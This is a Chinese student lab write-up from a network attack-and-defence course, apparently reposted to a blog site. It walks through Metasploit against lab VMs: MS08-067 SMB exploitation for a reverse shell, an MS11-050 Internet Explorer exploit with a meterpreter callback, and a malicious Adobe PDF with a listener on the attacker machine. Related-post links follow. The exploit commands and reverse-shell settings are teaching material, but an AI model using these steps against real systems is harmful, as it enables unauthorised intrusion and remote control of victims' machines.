2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用

最新推荐文章于 2024-10-02 08:00:00 发布
最新推荐文章于 2024-10-02 08:00:00 发布
阅读量128 收藏
点赞数
文章标签: 网络 运维 shell
原文链接:http://www.cnblogs.com/m20155310/p/8986765.html
版权

2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode

exploit:由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞

payload:攻击载荷,如后门等攻击代码。

encode:指编码,对我们的程序或代码进行伪装。

实验内容

一个主动攻击实践,如ms08_067

1.启用msf终端msfconsole

2.然后使用search命令搜索该漏洞对应的模块:search ms08_067

3.渗透攻击模块路径名为“exploit/windows/smb/ms08_067_netapi” 包含四部分:模块类型、目标平台、目标服务和模块名字。

use exploit/windows/smb/ms08_067_netapi

1.查看信息:

show payloads

2.选择攻击载荷:

set payload generic/shell_reverse_tcp

1073034-20180503180048939-1854298399.png

3.查看配置渗透攻击所需的配置项:

show options

4.查看渗透攻击模块所能成功渗透攻击的目标平台

show targets

1073034-20180503180057057-518283494.png

5.用show payloads查看可以供我们使用的攻击载荷:
1073034-20180503180104581-215982684.png

6.从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:
1073034-20180503180111578-2013267334.png

7.用show options查看需要设置的参数

•这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置:
1073034-20180503180118575-1210899066.png

8.设置target选项目标(例如我攻击系统为WIN xp 中文简体 SP2,所以选择10)

•确认参数设置无误后,用exploit指令开始攻击:
1073034-20180503180124969-531598745.png

9.攻击成功后会获取靶机的shell,可以对其进行操作:
1073034-20180503180131903-799933495.png

一个针对浏览器的攻击,如ms11_050

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.136.130 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5310 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > exploit

用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

在靶机IE上输入该网址
1073034-20180503233746692-2053727781.png

kali中显示session 1已经创建,并显示其会话ID
1073034-20180503233930364-1557222780.png

但是修改Internet的安全设置后失败了!

一个针对客户端的攻击,如Adobe

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.136.128 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5310 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 20155310.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit//攻击

成功生成20155310.pdf:
1073034-20180503235956163-2079126906.png

将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.136.128 //攻击机ip
msf exploit(handler) > set LPORT 5310 //攻击端口固定
msf exploit(handler) > exploit

然后在靶机上打开20155310.pdf文件
1073034-20180504000003672-514527268.png

成功应用任何一个辅助模块

用show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:
1073034-20180504000500047-701364485.png

查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。
1073034-20180504000507090-889717131.png

也可以对指定网段的主机进行扫描:
1073034-20180504000515180-1315739864.png

实践总结及体会

本次实验可以说是十分艰难了,主要在环境的配置上,自己配置了好久但还是不成功,最后拷了配置好的虚拟机。虽然整体实验流程并不复杂,但是仍然有失败的。通过这次实验感受到了msf工具功能的强大。

转载于:https://www.cnblogs.com/m20155310/p/8986765.html

weixin_30955341
关注
2017-2018-2 20155327『网络对抗技术Exp5MSF基础应用
weixin_30483013的博客
05-07 141
2017-2018-2 20155327『网络对抗技术Exp5MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击的一个过程,是一个载具。 payload:攻击载荷,如后门等攻击代码。 encode:用来编码,用于伪装 实践过程记录 1.Windows服务渗透攻击——MS08-067安全漏洞 ①攻击机:kali ...
2017-2018-2 20155303『网络对抗技术Exp5MSF基础应用
weixin_34008933的博客
04-17 197
2017-2018-2 20155303『网络对抗技术Exp5MSF基础应用 ————————CONTENTS———————— 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实践过程记录 1.Windows服务渗透攻击——MS08-067安全漏洞 2.浏览器渗透攻击——MS11-050 3.针对Office软件的渗透攻击——MS10-087 4.针对Adobe R...
# 2017-2018-2 20155319『网络对抗技术Exp5MSF基础应用
weixin_34413802的博客
05-02 156
2017-2018-2 20155319『网络对抗技术Exp5MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击的一个过程,是一个载具。 payload:攻击载荷,如后门等攻击代码。 encode:用来编码,用于伪装 实践过程记录 1.Windows服务渗透攻击——MS08-067安全漏洞 ①攻击机:kal...
2017-2018-2 20155224『网络对抗技术Exp5MSF基础应用
weixin_34345753的博客
05-06 113
基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。 payload也就相当于载荷,实际上就是之前我们实验中做到的shellcode,exploit把它传送到靶机中后,...
2017-2018-2 20155315《网络对抗技术Exp5MSF基础应用
weixin_30472035的博客
04-27 138
实验目的 学会用metasploit进行简单的攻击操作 教程 实验内容 metasploit中有六个模块分别是 渗透攻击模块(Exploit Modules) 辅助模块(Auxiliary Modules 攻击载荷(Payload Modules) 空字段模块(Nop Modules) 编码模块(Encoders) 后渗透攻击模块(Post) 本次实验使用的是exploit和auxiliar...
2017-2018-2 20155234『网络对抗技术Exp5MSF基础应用
weixin_30569001的博客
04-27 114
攻击MS08-067安全漏洞--WindowsXP 在kali输入msfconsole进入控制台,依次输入指令 第一次很遗憾失败了 发现是防火墙没关重新来过成功 攻击MS11-050安全漏洞--IE7.0 进入控制台,配置 在windows中打开IE访问 不知道为什么失败了,查看了狄老师的博客,她试验了很多方法也没有成功。 Adobe Reader软件的渗透攻击 进入控制台,配置生成 很...
2017-2018-2 20155314《网络对抗技术Exp5 MSF基础应用
axhc_chentao1981的博客
04-27 570
2017-2018-2 20155314《网络对抗技术Exp5 MSF基础应用 目录 实验内容 实验环境 基础问题回答 预备知识 实验步骤——基于Armitage的MSF自动化漏洞攻击实践 Armitage基础配置 ms08_067_netapi:自动化漏洞溢出攻击实践 ms14_064_ole_code_execution:IE漏洞自动化攻击实践 ms17_010_eterna...
2018-2019-2 网络对抗技术 20165324 Exp5MSF基础应用
weixin_34122810的博客
04-18 191
2018-2019-2 网络对抗技术 20165324 Exp5MSF基础应用 MSF基础知识: MSF基础框架: 主要模块模块(Module)。模块是指Metasploit框架中所使用的一段软件代码组件。 渗透攻击模块(Exploit Modules):是指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。 辅助模块(Auxiliary Modules): ...
2017-2018-2 20155203《网络对抗技术Exp5 MSF基础应用
weixin_34326558的博客
04-20 134
1.实践过程记录 1.1一个主动攻击实践,如ms08_067; msf > search ms08_067_netapi //查看可以用的工具 [!] Module database cache not built yet, using slow search Matching Modules ================ Name ...
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 399
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp4 恶意代码分析
weixin_44826338的博客
04-17 574
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp1 恶意代码分析 目录 1. 实验目标 2. 实验内容 2.1 系统运行监控 2.1.1 Windows计划任务schtasks 2.1.2 sysmon工具 2.2 恶意软件分析 2.2.1 系统运行监控 2.2.1 系统运行监控 3、答老师问 3.1 实验收获与感想 3.2 如果在工作中怀...
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 721
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
20194307肖江宇exp-1
MYRLY的博客
03-17 3163
20194307肖江《网络对抗技术》 exp1 逆向与Bof基础
20221902 2022-2023-2 《网络攻防实践》第六次作业
xiannvyeye的博客
04-15 384
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。
使用socket编程来实现一个简单的C/S模型(TCP协议)
最新发布
caiji0169的博客
10-02 1019
下图是基于TCP协议的客户端/服务器程序的一般流程:服务器调用socket()、bind()、listen()完成初始化后,调用accept()阻塞等待,处于监听端口的状态,客户端调用socket()初始化后,调用connect()发出SYN段并阻塞等待服务器应答,服务器应答一个SYN-ACK段,客户端收到后从connect()返回,同时应答一个ACK段,服务器收到后从accept()返回。数据传输的过程:建立连接后,TCP协议提供全双工的通信服务,但是一般的客户端/服务器程序的流程是由客户端主动发起请求,
MQTT--EMQX入门+MQTTX使用
CJPSR的博客
09-30 1062
EMQ X基于 Erlang/OTP 平台开发的MQTT 消息服务器,是开源社区中最流行的 MQTT 消息服务器。EMQ X 是开源百万级分布式。
信息安全对抗演习:应对网络威胁的坚实防线
dexun123的博客
09-29 838
演习结束后,需要对整个演习过程进行总结和评估。分析演习中发现的问题和不足并提出改进措施;同时总结经验教训为未来的演习提供参考。
网络层——IP
weixin_74269833的博客
09-28 1157
由32位二进制数组成,通常用点分的形式被分为四个部分,每个部分1byte,最大值为255。从功能的角度看,ip地址由两部分组成,网络号和主机号。网络号标识了ip所在的网段,主机号标识了在该网段中的唯一的一台主机。二者的区分又需要与掩码配合使用,例如192.168.1.2/24,24表示掩码255.255.255.0,将掩码与ip进行按位与操作,获得了192.168.1.0即为该主机所在网段。将IP地址中的主机地址全部设为0, 就成为了网络号, 代表这个局域网。
MSF基础与团队模型详解:原则、应用与CMMI比较
MSF(Microsoft Solution Framework)是一种由微软提出的项目管理和软件开发框架,旨在提供一套结构化的方法来指导项目的成功实施。其基本原则与团队模型是MSF的核心组成部分,涵盖了项目管理的关键要素。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值